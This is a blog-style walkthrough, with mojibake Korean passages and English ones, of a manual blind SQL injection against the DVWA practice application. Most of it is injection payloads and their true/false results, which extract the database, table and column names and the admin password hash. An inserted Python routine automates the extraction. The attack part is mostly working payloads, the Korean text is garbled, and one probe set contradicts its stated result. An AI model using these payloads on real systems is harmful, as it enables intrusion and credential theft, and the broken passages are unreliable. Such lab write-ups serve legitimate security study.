Archive for Dev. (junyup2)

์ง€์‹์„ ์ฑ„์›Œ๊ฐ€๋Š” ใ€Ž๊ฐœ๋ฐœ์ž/ํ™”์ดํŠธํ•ด์ปคใ€๋ฅผ ๋ชฉํ‘œ๋กœ ์ •๋ฆฌํ•˜๋Š” ๋ธ”๋กœ๊ทธ


[DVWA] SQL Injection (Blind, manual testing)

Gearvirus(junyup2) 2024. 4. 12. 23:29

Vulnerability: SQL Injection (Blind)

The goal is to read data inside the DB using Blind SQL Injection. In this exercise the web application, given an ID, only tells you whether that ID is valid (exists) or not (invalid / does not exist).

Entering a valid ID (the input evaluates to true) returns "User ID exists in the database."; entering an invalid ID (the input evaluates to false) returns "User ID is MISSING from the database."

In this exercise I will not use scanning programs (automation tools) such as nmap / sqlmap; only manual testing will be attempted.

(Automation with tools, or with Python, will be written up later.)

 

Vuln Point

์ฐธ์ธ ๊ฐ’ (1=1)
1' and 1=1 #
-> User ID exists in the database.

๊ฑฐ์ง“์ธ ๊ฐ’(1=2)
1' and 1=2 # 
-> User ID is MISSING from the database.

and ์—ฐ์‚ฐ์„ ์ด์šฉํ•˜์—ฌ ์ฐธ์ธ ๊ฐ’๊ณผ ๊ฑฐ์ง“์ธ ๊ฐ’์— ๋Œ€ํ•œ ๊ฒฐ๊ณผ ๊ฐ’์ด ๋‹ค๋ฅด๊ฒŒ ๋‚˜์˜ค๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๊ฒƒ์„ ํ†ตํ•ด SQL Injection ์ทจ์•ฝ์ ์ด ์กด์žฌํ•œ๋‹ค๊ณ  ์˜์‹ฌํ•ด๋ณผ ์ˆ˜ ์žˆ๋‹ค.

 

True/False

์ฐธ(True)์ธ ๊ฐ’๊ณผ ๊ฑฐ์ง“(False)์ธ ๊ฐ’์— ๋Œ€ํ•œ ์ฐจ์ด๋ฅผ ํ†ตํ•ด Blind SQL Injection์„ ์ด์šฉํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋œ๋‹ค.

๋ณธ ์‹ค์Šต ๋ฌธ์ œ์˜ ๊ฒฝ์šฐ ID ์ž…๋ ฅ์— ๋”ฐ๋ฅธ ์œ ํšจํ•œ ID ์—ฌ๋ถ€๋ฅผ ํŒ๋‹จํ•˜๊ณ  ์žˆ๋‹ค. DB์˜ ๋‚ด์šฉ์„ ์ง์ ‘์ ์œผ๋กœ ์œ ์ถœ(์ถœ๋ ฅ)ํ•˜๊ณ  ์žˆ์ง€๋Š” ์•Š๊ณ , ๋‹จ์ง€ ์˜ณ๋‹ค(True), ํ‹€๋ฆฌ๋‹ค(False)๋ผ๋Š” ๋ฐ˜์‘๋งŒ ๋‚ด๋ณด๋‚ธ๋‹ค๋Š” ๊ฒƒ์ด๋‹ค. ํ•˜์ง€๋งŒ ์ฐธ์ธ ๊ฐ’๊ณผ, ๊ฑฐ์ง“์ธ ๊ฐ’์˜ ์ฐจ์ด๊ฐ€ ์กด์žฌํ•˜๋ฏ€๋กœ์„œ ์งˆ์˜์— ๋Œ€ํ•œ ์‘๋‹ต ์ฐจ์ด๋ฅผ ํ†ตํ•ด Blind SQLi๋ฅผ ์‹ค์‹œํ•  ์ˆ˜ ์žˆ๋‹ค.

and ์—ฐ์‚ฐ์˜ ํŠน์ง•์„ ์ด์šฉํ•˜์—ฌ ์ฐธ and ์ฐธ / ์ฐธ and ๊ฑฐ์ง“์˜ ๊ฐ’์ด ๊ฐ๊ฐ ์ฐธ/๊ฑฐ์ง“์ธ ๊ฒƒ์„ ์ด์šฉํ•œ๋‹ค.

ํ•ญ์ƒ ์ฐธ(1=1) / ํ•ญ์ƒ ๊ฑฐ์ง“(1=2) ์ธ ๊ฐ’์„ and ๋ฅผ ์ด์šฉํ•˜์—ฌ ๋ฌถ์–ด์ฃผ์–ด WHERE ๋ฌธ์ด ์ฐธ์ธ ๊ฒฝ์šฐ ์กฐํšŒ์— ์„ฑ๊ณตํ•˜๊ณ , WHERE ๋ฌธ์ด ๊ฑฐ์ง“์ธ ๊ฒฝ์šฐ ์กฐํšŒ์— ์‹คํŒจํ•˜๋„๋กํ•˜๋Š” ๊ฒƒ์ด๋‹ค.

True and True = True
SELECT * FROM users WHERE user_id='1' and 1=1 #';   -> (True)

True and False = False
SELECT * FROM users WHERE user_id='1' and 1=2 #';   -> (False)

 

DVWA Blind SQL Injection practice

Practice environment
- DVWA running in Docker on Windows
- Burp Suite on Windows

With Blind SQL Injection only one character of a single row of output can be checked at a time, so LIMIT must be used.

 

Security Level: Low

LOW ๋ ˆ๋ฒจ์˜ ๊ฒฝ์šฐ ์ž…๋ ฅ ๊ฐ’์— ๋Œ€ํ•œ ์ œํ•œ์ด ๋”ฑํžˆ ์—†๋‹ค. DB์ด๋ฆ„ / ์›ํ•˜๋Š” ํ…Œ์ด๋ธ” / ์›ํ•˜๋Š” ์ปฌ๋Ÿผ / ์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ ๋ฅผ ๊ฐ๊ฐ ํ•œ ๊ฐœ์”ฉ๋งŒ ๋ฝ‘์•„๋ณผ ๊ฒƒ์ด๋‹ค.

Blind SQL Injection์˜ Process์— ๋”ฐ๋ผ ์ง„ํ–‰ํ•œ๋‹ค. ์šฐ์„  ์ฐธ/๊ฑฐ์ง“์— ๋Œ€ํ•œ ์‘๋‹ต์„ ํ™•์ธํ•ด๋ณธ๋‹ค.

 

True / False

True value: 1' and 1=1 #

False value: 1' and 1=2 #

 

Attack query

First write the attack query, then insert the desired SQL statement in the place where the SQL goes.

For Blind SQLi, the substr function cuts out the character we want, the value is converted to its ASCII code and a binary search is carried out. Here, instead of the comparison operators (>, <), I use bitwise logic (the binary code): the value is ANDed with 1, 2, 4, 8, 16, 32 and 64 in turn, each result is checked as true or false, and the sum of the values that came out true is the ASCII code.

"One set" for determining the value of a single character
1' and ascii(substr((select __SQL__),1,1))&1=1#
1' and ascii(substr((select __SQL__),1,1))&2=2#
1' and ascii(substr((select __SQL__),1,1))&4=4#
1' and ascii(substr((select __SQL__),1,1))&8=8#
1' and ascii(substr((select __SQL__),1,1))&16=16#
1' and ascii(substr((select __SQL__),1,1))&32=32#
1' and ascii(substr((select __SQL__),1,1))&64=64#
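The arithmetic behind "one set", as an added example that is not part of the original post: `char_from_true_masks` is exactly the sum the post does by hand (4 + 32 + 64 = 100 -> d), and `recover` goes one step beyond the post by running the same seven-mask loop against a locally simulated true/false oracle, so the whole reconstruction can be checked offline with no web application involved. The oracle, the secret strings and the stop condition are my stand-ins: they assume MySQL semantics, where substr past the end of the string returns '' and ascii('') is 0.

```python
# Added example, not code from the post: bit-mask reconstruction of one character
# and the general loop over a simulated "exists / MISSING" oracle.

MASKS = (1, 2, 4, 8, 16, 32, 64)   # the seven probes of "one set"


def char_from_true_masks(true_masks):
    """The masks that answered 'true' add up to the ASCII code: [4, 32, 64] -> 100 -> 'd'."""
    return chr(sum(true_masks))


def decode_recorded(rows):
    """rows: one list per character, each holding the masks that were answered 'true'."""
    return "".join(char_from_true_masks(r) for r in rows)


def make_oracle(secret):
    """Stand-in (assumption) for the application's answer to
    ascii(substr(secret, pos, 1)) & mask = mask. Counts how many probes were made."""
    calls = {"n": 0}

    def oracle(pos, mask):
        calls["n"] += 1
        if pos > len(secret):
            return False          # MySQL: substr past the end is '' and ascii('') = 0
        return (ord(secret[pos - 1]) & mask) == mask

    oracle.calls = calls
    return oracle


def recover(oracle, max_len=64):
    """General form of the post's procedure: seven probes per position until
    every mask answers false, which marks the end of the string."""
    out = []
    for pos in range(1, max_len + 1):
        code = sum(m for m in MASKS if oracle(pos, m))
        if code == 0:
            break
        out.append(chr(code))
    return "".join(out)


if __name__ == "__main__":
    # The post's recorded answers for the DB name.
    print(decode_recorded([[4, 32, 64], [2, 4, 16, 32, 64], [1, 2, 4, 16, 32, 64], [1, 32, 64]]))
    o = make_oracle("5f4dcc3b5aa765d61d8327deb882cf99")   # constructed secret for the demo
    print(recover(o), o.calls["n"], "probes")
```

Two caveats worth keeping in mind: the seven masks only cover codes 0 to 127, and MySQL's ascii() returns the value of the first byte, so a non-ASCII byte would need a 128 mask as well; and the stop condition relies on ascii('') being 0, which is why a 32-character value costs 7 x 32 + 7 probes rather than 7 x 32.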

 

DB ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

select database()

DB์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select database()),1,1))&1=1# (false)
1' and ascii(substr((select database()),1,1))&2=2# (false)
1' and ascii(substr((select database()),1,1))&4=4# (true)
1' and ascii(substr((select database()),1,1))&8=8# (false)
1' and ascii(substr((select database()),1,1))&16=16# (false)
1' and ascii(substr((select database()),1,1))&32=32# (true)
1' and ascii(substr((select database()),1,1))&64=64# (true)
4, 32, 64 -> 100 -> d

The bitwise results add up to ASCII code 100, so the character is d.

1' and ascii(substr((select database()),2,1))&1=1# (false)
1' and ascii(substr((select database()),2,1))&2=2# (true)
1' and ascii(substr((select database()),2,1))&4=4# (true)
1' and ascii(substr((select database()),2,1))&8=8# (false)
1' and ascii(substr((select database()),2,1))&16=16# (true)
1' and ascii(substr((select database()),2,1))&32=32# (true)
1' and ascii(substr((select database()),2,1))&64=64# (true)
2, 4, 16, 32, 64 -> 118 -> v

The bitwise results add up to ASCII code 118, so the character is v.

1' and ascii(substr((select database()),3,1))&1=1# (true)
1' and ascii(substr((select database()),3,1))&2=2# (true)
1' and ascii(substr((select database()),3,1))&4=4# (true)
1' and ascii(substr((select database()),3,1))&8=8# (false)
1' and ascii(substr((select database()),3,1))&16=16# (true)
1' and ascii(substr((select database()),3,1))&32=32# (true)
1' and ascii(substr((select database()),3,1))&64=64# (true)
1, 2, 4, 16, 32, 64 -> 119 -> w

The bitwise results add up to ASCII code 119, so the character is w.

1' and ascii(substr((select database()),4,1))&1=1# (true)
1' and ascii(substr((select database()),4,1))&2=2# (false)
1' and ascii(substr((select database()),4,1))&4=4# (false)
1' and ascii(substr((select database()),4,1))&8=8# (false)
1' and ascii(substr((select database()),4,1))&16=16# (false)
1' and ascii(substr((select database()),4,1))&32=32# (true)
1' and ascii(substr((select database()),4,1))&64=64# (true)
1, 32, 64 -> 97 -> a

The bitwise results add up to ASCII code 97, so the character is a.

Combining the characters above, the DB name is dvwa.

 

TABLE ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ํ…Œ์ด๋ธ”์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.(2๋ฒˆ์งธ์— ์กด์žฌํ•˜๋Š” ํ…Œ์ด๋ธ”์„ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.)

select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1

ํ•ด๋‹น Table์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&1=1# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&2=2# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&4=4# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&8=8# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&16=16# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&32=32# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),1,1))&64=64# (true)
1, 4, 16, 32, 64 -> 117 -> u

The bitwise results add up to ASCII code 117, so the character is u.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&1=1# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&2=2# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&4=4# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&8=8# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&16=16# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&32=32# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),2,1))&64=64# (true)
1, 2, 16, 32, 64 -> 115 -> s

The bitwise results add up to ASCII code 115, so the character is s.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&1=1# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&2=2# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&4=4# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&8=8# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&16=16# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&32=32# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),3,1))&64=64# (true)
1, 4, 32, 64 -> 101 -> e

The bitwise results add up to ASCII code 101, so the character is e.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&1=1# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&2=2# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&4=4# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&8=8# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&16=16# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&32=32# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),4,1))&64=64# (false)
2, 16, 32, 64 -> 114 -> r

The bitwise results add up to ASCII code 114, so the character is r.

1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&1=1# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&2=2# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&4=4# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&8=8# (false)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&16=16# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&32=32# (true)
1' and ascii(substr((select table_name from information_schema.tables where table_schema = 'dvwa' limit 1,1),5,1))&64=64# (true)
1, 2, 16, 32, 64 -> 115 -> s

The bitwise results add up to ASCII code 115, so the character is s.

Combining the characters above, the table name is users.

 

COLUMN ์ด๋ฆ„ ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ์ปฌ๋Ÿผ์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.(users ํ…Œ์ด๋ธ”์˜ 5๋ฒˆ์งธ์— ์กด์žฌํ•˜๋Š” ์ปฌ๋Ÿผ์„ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.)

select column_name from information_schema.columns where table_name = 'users' limit 4,1

ํ•ด๋‹น Column์˜ ์ด๋ฆ„์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&1=1# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&2=2# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&4=4# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&16=16# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),1,1))&64=64# (true)
16, 32, 64 -> 112 -> p

The bitwise results add up to ASCII code 112, so the character is p.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&1=1# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&2=2# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&4=4# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&16=16# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),2,1))&64=64# (true)
1, 32, 64 -> 97 -> a

The bitwise results add up to ASCII code 97, so the character is a.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&1=1# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&2=2# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&4=4# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&16=16# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),3,1))&64=64# (true)
1, 2, 16, 32, 64 -> 115 -> s

The bitwise results add up to ASCII code 115, so the character is s.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&1=1# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&2=2# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&4=4# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&16=16# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),4,1))&64=64# (true)
1, 2, 16, 32, 64 -> 115 -> s

The bitwise results add up to ASCII code 115, so the character is s.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&1=1# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&2=2# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&4=4# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&16=16# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),5,1))&64=64# (true)
1, 2, 4, 16, 32, 64 -> 119 -> w

The bitwise results add up to ASCII code 119, so the character is w.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&1=1# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&2=2# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&4=4# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&8=8# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&16=16# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),6,1))&64=64# (true)
1, 2, 4, 8, 32, 64 -> 111 -> o

The bitwise results add up to ASCII code 111, so the character is o.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&1=1# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&2=2# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&4=4# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&16=16# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),7,1))&64=64# (true)
2, 16, 32, 64 -> 114 -> r

The bitwise results add up to ASCII code 114, so the character is r.

1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&1=1# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&2=2# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&4=4# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&8=8# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&16=16# (false)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&32=32# (true)
1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' limit 4,1),8,1))&64=64# (true)
4, 32, 64 -> 100 -> d

The bitwise results add up to ASCII code 100, so the character is d.

Combining the characters above, the column name is password.

 

DATA ํ™•์ธํ•˜๊ธฐ

์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ์˜ ์œ„์น˜๋ฅผ ์ด๋ฏธ ์•Œ๊ณ ์„œ ์ง„ํ–‰ํ•œ๋‹ค.( users ํ…Œ์ด๋ธ”์˜ user ์ปฌ๋Ÿผ์˜ admin ๋ฐ์ดํ„ฐ์— ๋งค์น˜๋˜๋Š” password ์ปฌ๋Ÿผ์˜ ์ฒซ ๋ฒˆ์งธ ๊ฐ’์— ํ•ด๋‹นํ•˜๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์กฐํšŒํ•  ๊ฒƒ์ด๋‹ค.) 

๋‹ค์Œ์˜ ๋ฐ์ดํ„ฐ๋Š” SQL Injection์—์„œ ์กฐํšŒํ•œ ๊ฒฐ๊ณผ์ด๋‹ค. ๋‹ค์Œ์˜ ๋ฐ์ดํ„ฐ๋ฅผ Blind SQL Injection์„ ์ด์šฉํ•˜์—ฌ ์กฐํšŒํ•˜๊ณ  ์ผ์น˜ํ•˜๋Š”์ง€ ์—ฌ๋ถ€๋ฅผ ํ™•์ธํ•ด ๋ณผ ๊ฒƒ์ด๋‹ค.

select password from users limit 0,1

ํ•ด๋‹น Data์˜ ๊ฐ’์„ ํ•œ๊ธ€์ž์”ฉ ํ™•์ธํ•ด ๋ณด๋ฉด ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค. (Low ๋ ˆ๋ฒจ์— ํ•œํ•˜์—ฌ, 32 ์ž์˜ ๊ฒฐ๊ณผ ์ „๋ถ€๋ฅผ ์ ์–ด ๋ณธ๋‹ค.)

1' and ascii(substr((select password from users limit 0,1),1,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),1,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),1,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),1,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),1,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),1,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),1,1))&64=64#
1, 4, 16, 32 -> 53 -> 5

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 53์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 5๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),2,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),2,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),2,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),2,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),2,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),2,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),2,1))&64=64#
2, 4, 32, 64 -> 102 -> f

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 102์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ f๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),3,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),3,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),3,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),3,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),3,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),3,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),3,1))&64=64#
4, 16, 32 -> 52 -> 4

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 52์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 4๊ฐ€ ๋œ๋‹ค.

4) 4, 32, 64 -> 100 -> d
5) 1, 2, 32, 64 -> 99 -> c
6) 1, 2, 32, 64 -> 99 -> c
7) 1, 2, 16, 32 -> 51 -> 3
8) 2, 32, 64 -> 98 -> b
9) 1, 4, 16, 32 -> 53 -> 5
10) 1, 32, 64 -> 97 -> a
11) 1, 32, 64 -> 97 -> a
12) 1, 2, 4, 16, 32 -> 55 -> 7
13) 2, 4, 16, 32 -> 54 -> 6
14) 1, 4, 16, 32 -> 53 -> 5
15) 4, 32, 64 -> 100 -> d
16) 2, 4, 16, 32 -> 54 -> 6
17) 1, 16, 32 -> 49 -> 1
18) 4, 32, 64 -> 100 -> d
19) 8, 16, 32 -> 56 -> 8
20) 1, 2, 16, 32 -> 51 -> 3
21) 2, 16, 32 -> 50 -> 2
22) 1, 2, 4, 16, 32 -> 55 -> 7
23) 4, 32, 64 -> 100 -> d
24) 1, 4, 32, 64 -> 101 -> e
25) 2, 32, 64 -> 98 -> b
26) 8, 16, 32 -> 56 -> 8
27) 8, 16, 32 -> 56 -> 8
28) 2, 16, 32 -> 50 -> 2
29) 1, 2, 32, 64 -> 99 -> c
30) 2, 4, 32, 64 -> 102 -> f

The bitwise results for characters 4 to 30 are as listed above.

1' and ascii(substr((select password from users limit 0,1),31,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),31,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),31,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),31,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),31,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),31,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),31,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 57์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 9๊ฐ€ ๋œ๋‹ค.

1' and ascii(substr((select password from users limit 0,1),32,1))&1=1#
1' and ascii(substr((select password from users limit 0,1),32,1))&2=2#
1' and ascii(substr((select password from users limit 0,1),32,1))&4=4#
1' and ascii(substr((select password from users limit 0,1),32,1))&8=8#
1' and ascii(substr((select password from users limit 0,1),32,1))&16=16#
1' and ascii(substr((select password from users limit 0,1),32,1))&32=32#
1' and ascii(substr((select password from users limit 0,1),32,1))&64=64#
1, 8, 16, 32 -> 57 -> 9

๋…ผ๋ฆฌ ์—ฐ์‚ฐ์˜ ๊ฒฐ๊ณผ๋ฅผ ๋ณด๋ฉด ascii ์ฝ”๋“œ 57์— ํ•ด๋‹นํ•˜๋ฏ€๋กœ 9๊ฐ€ ๋œ๋‹ค.

์œ„์˜ ๊ฐ ๊ธ€์ž๋ฅผ ์กฐํ•ฉํ•˜๋ฉด ํ•ด๋‹น Data์˜ ๊ฐ’์€ ๋‹ค์Œ๊ณผ ๊ฐ™๊ณ , ์ด๋ฅผ ์ด๋ฏธ ์•Œ๊ณ  ์žˆ๋Š” ๊ฐ’๊ณผ ๋น„๊ต๋ณด๋ฉด ์ผ์น˜ํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค.

